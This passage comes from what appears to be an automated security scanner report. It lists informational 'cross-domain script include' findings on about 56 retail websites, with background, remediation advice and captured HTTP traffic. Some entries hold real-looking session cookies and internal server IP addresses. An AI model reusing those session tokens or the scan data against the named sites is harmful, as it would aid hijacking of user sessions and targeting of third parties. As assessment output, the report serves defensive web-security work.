</iframe>
...[SNIP]...
<li>Intel® <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel® <a target="_blank" href="http://syndication.intel.com/DistributeModule.aspx?ppc_cid=IIP_02105071701&cc=US&contentType=0" onclick="return intel(this)" class="intel-pentium-locked" title="Click here to learn more about Intel® Pentium® Processors">Pentium®</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li><a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=">Sign Up for Emails</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/">us.toshiba.com</a>
...[SNIP]...
<li><a href="http://www.toshiba.com/tai/">Toshiba USA</a>
...[SNIP]...
<li><a href="http://us.toshiba.com/innovation-lab/green">Recycle & Trade-in</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/navShell.jsp?cf=su_contact">Contact

Support</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp?nav=Download">Downloads &

Drivers</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/globalEntitlement.jsp?

nav=Warranty">Warranty & Service</a>
...[SNIP]...
<li><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp">Tech Support Home</a>
...[SNIP]...
<div class="logos">
<a target="_blank" href="http://www.la.bbb.org/BusinessReport.aspx?CompanyID=41153"><img alt=""

src="/images/ui5/bbbLogo.gif"></a>
<a href="https://www.scanalert.com/RatingVerify?ref=www.toshibadirect.com" target="_blank"><img width="65"
height="37" border="0" oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." src="//images.scanalert.com/meter/survey/www.toshibadirect.com/31.gif"></a>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<IMG STYLE="position:absolute; " SRC="http://ad.doubleclick.net/activity;src=1000873;type=toshi381;cat=noteb727;num=65821692;ord=1?" WIDTH="1" HEIGHT="1" BORDER="0">
...[SNIP]...

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18. Cross-domain script include previous next
There are 56 instances of this issue:

http://buy.travelguard.com/TGI2/proc/stateselector.aspx
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://hire.jobvite.com/CompanyJobs/Careers.aspx
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm
https://secure.orientaltrading.com/ui/userProfile/processRequest.do
http://shop.pacsun.com/home.jsp
http://subscriptions.marvel.com/
http://subscriptions.marvel.com/checkout/
https://subscriptions.marvel.com/checkout/
http://www.acehardware.com/category/index.jsp
http://www.acehardware.com/home/index.jsp
https://www.acehardware.com/checkout/index.jsp
http://www.armaniexchange.com/category/womens.do
http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
http://www.bluefly.com/
http://www.bluenile.com/
http://www.bluenile.com/build-your-own-diamond-ring
http://www.bluenile.com/engagement-rings
http://www.brookstone.com/
http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html
http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html
http://www.brookstone.com/outdoor-living.html
http://www.brookstone.com/shoppingCart.jsp.vr
https://www.brookstone.com/formhandlerservlet
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.footlocker.com/
https://www.footlocker.com/account/default.cfm
https://www.footlocker.com/account/default/
http://www.ftd.com/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
http://www.gnc.com/community/index.jsp%20%20
http://www.gnc.com/home/index.jsp
https://www.gnc.com/checkout/index.jsp
http://www.guitarcenter.com/
https://www.guitarcenter.com/MyAccount/Login.aspx
http://www.helzberg.com/
https://www.helzberg.com/account/login.do
http://www.homedepot.ca/catalog/concrete/173198
http://www.homedepot.ca/webapp/wcs/stores/servlet/Home
http://www.orientaltrading.com/
http://www.petco.com/
http://www.petsmart.com/
https://www.petsmart.com/checkout/index.jsp
http://www.redcrossstore.org/
http://www.redcrossstore.org/dp.aspx
http://www.redcrossstore.org/shopper/prodlist.aspx
http://www.siteadvisor.com/download/windows.html
http://www.toshibadirect.com/td/b2c/laptops.to
https://www.toshibadirect.com/td/b2c/myaccount.to
http://www.travelguard.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

18.1. http://buy.travelguard.com/TGI2/proc/stateselector.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/TGI2/proc/stateselector.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=buy.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

Response

18.2. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following scripts from other domains:

http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30
http://www.googleadservices.com/pagead/conversion.js

Request

Response

18.3. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.4. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA

Request

Response

18.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://pics.bluenile.com/1166193570/bundles/core.js
http://pics.bluenile.com/1495474762/js/navigation_flyouts_menu.js
http://pics.bluenile.com/442036000/js/ga.js
http://pics.bluenile.com/N877218625/bundles/allpages.js
http://www.linkedin.com/companyInsider?script&useBorder=no

Request

Response

18.6. https://ordering.ftd.com/new-signup/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/new-signup/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ftd.netmng.com/?aid=181
https://www.ftdimg.com/js/omniture.js
https://www.ftdimg.com/js/tealeaf.js
https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
https://www.ftdimg.com/v20110407/js/compressed.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>

<script language="javascript" src="https://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...

<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...

<script language="JavaScript" src="https://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.7. https://ordering.ftd.com/reminder-signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/reminder-signin/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ftd.netmng.com/?aid=181
https://www.ftdimg.com/js/omniture.js
https://www.ftdimg.com/js/tealeaf.js
https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
https://www.ftdimg.com/v20110407/js/compressed.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>

<script language="javascript" src="https://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...

<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...

<script language="JavaScript" src="https://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.8. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ftd.netmng.com/?aid=181
https://www.ftdimg.com/js/omniture.js
https://www.ftdimg.com/js/tealeaf.js
https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
https://www.ftdimg.com/v20110407/js/compressed.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>

<script language="javascript" src="https://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...

<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...

<script language="JavaScript" src="https://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.9. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.homedepot.ca
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The response dynamically includes the following scripts from other domains:

https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js
https://www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1

Request

Response

18.10. https://secure.orientaltrading.com/ui/userProfile/processRequest.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/ui/userProfile/processRequest.do

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

18.11. http://shop.pacsun.com/home.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.pacsun.com
Path:	/home.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://server.iad.liveperson.net/hc/LPpacificsunwear/x.js?cmd=file&file=chatScript3&site=LPpacificsunwear&category=en;liveperson;1

Request

GET /home.jsp HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD; mbox=check#true#1305510282|session#1305510221453-787352#1305512082; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

18.12. http://subscriptions.marvel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure-us.imrworldwide.com/v53.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmb=125179656; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:30 GMT
Server: Apache
X-server-addr: 192.168.100.57
X-trying: 192.168.100.202
X-mysql: 192.168.100.202
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Type: text/html; charset=utf-8
Content-Length: 57886

<html>
<head>
<title>Marvel Subscriptions - Home</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen">

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

18.13. http://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/checkout/

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure-us.imrworldwide.com/v53.js
http://www.google-analytics.com/urchin.js

Request

Response

18.14. https://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/checkout/

Issue detail

The response dynamically includes the following scripts from other domains:

https://secure-us.imrworldwide.com/v53.js
https://ssl.google-analytics.com/urchin.js

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:22 GMT
Server: Apache
X-server-addr: 192.168.100.7
X-trying: 192.168.100.114
X-mysql: 192.168.100.114
Vary: Accept-Encoding
X-ServerNickName: Mj
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27219

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="https://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="scree
...[SNIP]...


<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

18.15. http://www.acehardware.com/category/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/category/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ace.imageg.net/include/flashobject.js
http://ace.imageg.net/include/infozone.js
http://ace.imageg.net/include/minicart.js
http://ace.imageg.net/include/swfobject.js
http://ace.imageg.net/include/tabset.js
http://ace.imageg.net/include/tabset_dept.js
http://ace.imageg.net/js/DF_main.js
http://ace.imageg.net/js/PG_ACE_emailSignupToggle.js
http://ace.imageg.net/js/WIZ_ToolTip.js
http://ace.imageg.net/js/WIZ_box.js
http://ace.imageg.net/js/WIZ_topNav.js
http://ace.imageg.net/js/gomez-gtagb4_noobj.js
http://ace.imageg.net/pwr/engine/js/full.js
http://media.gsimedia.net/tg/gsiutt/store133.js
https://dsa.csdata1.com/data/js/9027093/csgather.js

Request

Response

18.16. http://www.acehardware.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/home/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://ace.imageg.net/include/flashobject.js
http://ace.imageg.net/include/infozone.js
http://ace.imageg.net/include/minicart.js
http://ace.imageg.net/include/swfobject.js
http://ace.imageg.net/include/tabset.js
http://ace.imageg.net/include/tabset_home.js
http://ace.imageg.net/js/DF_main.js
http://ace.imageg.net/js/PG_ACE_emailSignupToggle.js
http://ace.imageg.net/js/WIZ_TempTizzy.js
http://ace.imageg.net/js/WIZ_topNav.js
http://ace.imageg.net/js/gomez-gtagb4_noobj.js
http://ace.imageg.net/pwr/engine/js/full.js
http://media.gsimedia.net/tg/gsiutt/store133.js
https://dsa.csdata1.com/data/js/9027093/csgather.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">


                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</div>


                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>

               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...

18.17. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://dsa.csdata1.com/data/js/9027093/csgather.js
https://media.gsimedia.net/tg/gsiutt/store133.js

Request

Response

18.18. http://www.armaniexchange.com/category/womens.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.armaniexchange.com
Path:	/category/womens.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js
http://t.p.mybuys.com/js/mybuys3.js

Request

GET /category/womens.do HTTP/1.1
Host: www.armaniexchange.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; customer=none; basket=none; s_cc=true; gpv_p4l=Womens; s_sq=%5B%5BB%5D%5D; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; fsr.s={"v":1,"rid":"1305510204631_768485","to":3,"c":"http://www.armaniexchange.com/category/womens.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 01:55:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:55:22 GMT
Connection: close
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 01:55:21 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 01:55:21 GMT
Content-Length: 72933

<script language="JavaScript">
// Disable edit cell tab.
parent.editCell.
...[SNIP]...
<link
href="http://t.p.mybuys.com/css/mbstyles.css"
type="text/css"
rel="stylesheet"
id="mybuysstyles">
<script
type="text/javascript"
src="http://t.p.mybuys.com/js/mybuys3.js">
</script>
<script
type="text/javascript"
src="http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js">
</script>
...[SNIP]...

18.19. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/c/browse/Underwater-Equipment/ci/11585/N/4294551294

Issue detail

The response dynamically includes the following script from another domain:

http://static.feedroom.com/affiliate/_common/js/fr_embed.js

Request

Response

18.20. http://www.bluefly.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.mercent.com/js/tracker.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
